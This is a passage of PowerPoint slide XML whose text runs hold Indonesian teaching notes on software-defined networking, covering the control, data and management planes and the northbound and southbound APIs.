              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sepenuhnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan API. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ribuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan virtual - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mundur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selangkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>abstrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>":</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perutean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SDN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Keputusan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinteraksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> API. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SDN dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> API "northbound", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> API "southbound". SDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual, router, dan firewall. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
